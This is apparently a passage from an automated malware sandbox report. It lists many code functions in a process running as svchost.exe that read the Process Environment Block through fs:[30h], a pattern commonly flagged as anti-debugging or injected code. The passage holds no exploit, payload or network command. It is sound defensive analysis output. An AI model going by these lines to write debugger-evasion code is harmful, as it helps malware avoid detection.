                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860124 mov eax, dword ptr fs:[00000030h]3_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov ecx, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C156 mov eax, dword ptr fs:[00000030h]3_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C8158 mov eax, dword ptr fs:[00000030h]3_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836154 mov eax, dword ptr fs:[00000030h]3_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836154 mov eax, dword ptr fs:[00000030h]3_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904164 mov eax, dword ptr fs:[00000030h]3_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904164 mov eax, dword ptr fs:[00000030h]3_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383208A mov eax, dword ptr fs:[00000030h]3_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038280A0 mov eax, dword ptr fs:[00000030h]3_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C80A8 mov eax, dword ptr fs:[00000030h]3_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F60B8 mov eax, dword ptr fs:[00000030h]3_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F60B8 mov ecx, dword ptr fs:[00000030h]3_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B20DE mov eax, dword ptr fs:[00000030h]3_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038380E9 mov eax, dword ptr fs:[00000030h]3_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60E0 mov eax, dword ptr fs:[00000030h]3_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C0F0 mov eax, dword ptr fs:[00000030h]3_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038720F0 mov ecx, dword ptr fs:[00000030h]3_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4000 mov ecx, dword ptr fs:[00000030h]3_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A020 mov eax, dword ptr fs:[00000030h]3_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C020 mov eax, dword ptr fs:[00000030h]3_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6030 mov eax, dword ptr fs:[00000030h]3_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832050 mov eax, dword ptr fs:[00000030h]3_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6050 mov eax, dword ptr fs:[00000030h]3_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385C073 mov eax, dword ptr fs:[00000030h]3_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D678E mov eax, dword ptr fs:[00000030h]3_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038307AF mov eax, dword ptr fs:[00000030h]3_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E47A0 mov eax, dword ptr fs:[00000030h]3_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C7C0 mov eax, dword ptr fs:[00000030h]3_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B07C3 mov eax, dword ptr fs:[00000030h]3_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE7E1 mov eax, dword ptr fs:[00000030h]3_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038347FB mov eax, dword ptr fs:[00000030h]3_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038347FB mov eax, dword ptr fs:[00000030h]3_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C700 mov eax, dword ptr fs:[00000030h]3_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830710 mov eax, dword ptr fs:[00000030h]3_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860710 mov eax, dword ptr fs:[00000030h]3_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C720 mov eax, dword ptr fs:[00000030h]3_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C720 mov eax, dword ptr fs:[00000030h]3_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386273C mov eax, dword ptr fs:[00000030h]3_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386273C mov ecx, dword ptr fs:[00000030h]3_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386273C mov eax, dword ptr fs:[00000030h]3_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC730 mov eax, dword ptr fs:[00000030h]3_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386674D mov esi, dword ptr fs:[00000030h]3_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386674D mov eax, dword ptr fs:[00000030h]3_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386674D mov eax, dword ptr fs:[00000030h]3_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830750 mov eax, dword ptr fs:[00000030h]3_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE75D mov eax, dword ptr fs:[00000030h]3_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872750 mov eax, dword ptr fs:[00000030h]3_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872750 mov eax, dword ptr fs:[00000030h]3_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4755 mov eax, dword ptr fs:[00000030h]3_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838770 mov eax, dword ptr fs:[00000030h]3_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834690 mov eax, dword ptr fs:[00000030h]3_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834690 mov eax, dword ptr fs:[00000030h]3_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C6A6 mov eax, dword ptr fs:[00000030h]3_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038666B0 mov eax, dword ptr fs:[00000030h]3_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A6C7 mov eax, dword ptr fs:[00000030h]3_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B06F1 mov eax, dword ptr fs:[00000030h]3_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B06F1 mov eax, dword ptr fs:[00000030h]3_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE609 mov eax, dword ptr fs:[00000030h]3_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872619 mov eax, dword ptr fs:[00000030h]3_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E627 mov eax, dword ptr fs:[00000030h]3_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03866620 mov eax, dword ptr fs:[00000030h]3_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868620 mov eax, dword ptr fs:[00000030h]3_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383262C mov eax, dword ptr fs:[00000030h]3_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384C640 mov eax, dword ptr fs:[00000030h]3_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F866E mov eax, dword ptr fs:[00000030h]3_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F866E mov eax, dword ptr fs:[00000030h]3_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A660 mov eax, dword ptr fs:[00000030h]3_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A660 mov eax, dword ptr fs:[00000030h]3_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862674 mov eax, dword ptr fs:[00000030h]3_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832582 mov eax, dword ptr fs:[00000030h]3_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832582 mov ecx, dword ptr fs:[00000030h]3_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864588 mov eax, dword ptr fs:[00000030h]3_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E59C mov eax, dword ptr fs:[00000030h]3_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h]3_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h]3_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h]3_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038545B1 mov eax, dword ptr fs:[00000030h]3_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038545B1 mov eax, dword ptr fs:[00000030h]3_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E5CF mov eax, dword ptr fs:[00000030h]3_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E5CF mov eax, dword ptr fs:[00000030h]3_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038365D0 mov eax, dword ptr fs:[00000030h]3_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5D0 mov eax, dword ptr fs:[00000030h]3_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5D0 mov eax, dword ptr fs:[00000030h]3_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038325E0 mov eax, dword ptr fs:[00000030h]3_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C5ED mov eax, dword ptr fs:[00000030h]3_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C5ED mov eax, dword ptr fs:[00000030h]3_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6500 mov eax, dword ptr fs:[00000030h]3_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838550 mov eax, dword ptr fs:[00000030h]3_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838550 mov eax, dword ptr fs:[00000030h]3_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386656A mov eax, dword ptr fs:[00000030h]3_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386656A mov eax, dword ptr fs:[00000030h]3_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386656A mov eax, dword ptr fs:[00000030h]3_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA49A mov eax, dword ptr fs:[00000030h]3_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038364AB mov eax, dword ptr fs:[00000030h]3_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038644B0 mov ecx, dword ptr fs:[00000030h]3_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BA4B0 mov eax, dword ptr fs:[00000030h]3_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038304E5 mov ecx, dword ptr fs:[00000030h]3_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868402 mov eax, dword ptr fs:[00000030h]3_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868402 mov eax, dword ptr fs:[00000030h]3_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868402 mov eax, dword ptr fs:[00000030h]3_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h]3_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h]3_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h]3_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C427 mov eax, dword ptr fs:[00000030h]3_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A430 mov eax, dword ptr fs:[00000030h]3_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA456 mov eax, dword ptr fs:[00000030h]3_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382645D mov eax, dword ptr fs:[00000030h]3_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385245A mov eax, dword ptr fs:[00000030h]3_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC460 mov ecx, dword ptr fs:[00000030h]3_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h]3_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h]3_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h]3_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840BBE mov eax, dword ptr fs:[00000030h]3_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840BBE mov eax, dword ptr fs:[00000030h]3_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4BB0 mov eax, dword ptr fs:[00000030h]3_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4BB0 mov eax, dword ptr fs:[00000030h]3_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h]3_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h]3_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h]3_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h]3_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h]3_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h]3_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DEBD0 mov eax, dword ptr fs:[00000030h]3_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h]3_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h]3_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h]3_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EBFC mov eax, dword ptr fs:[00000030h]3_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCBF0 mov eax, dword ptr fs:[00000030h]3_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904B00 mov eax, dword ptr fs:[00000030h]3_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EB20 mov eax, dword ptr fs:[00000030h]3_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EB20 mov eax, dword ptr fs:[00000030h]3_2_0385EB20
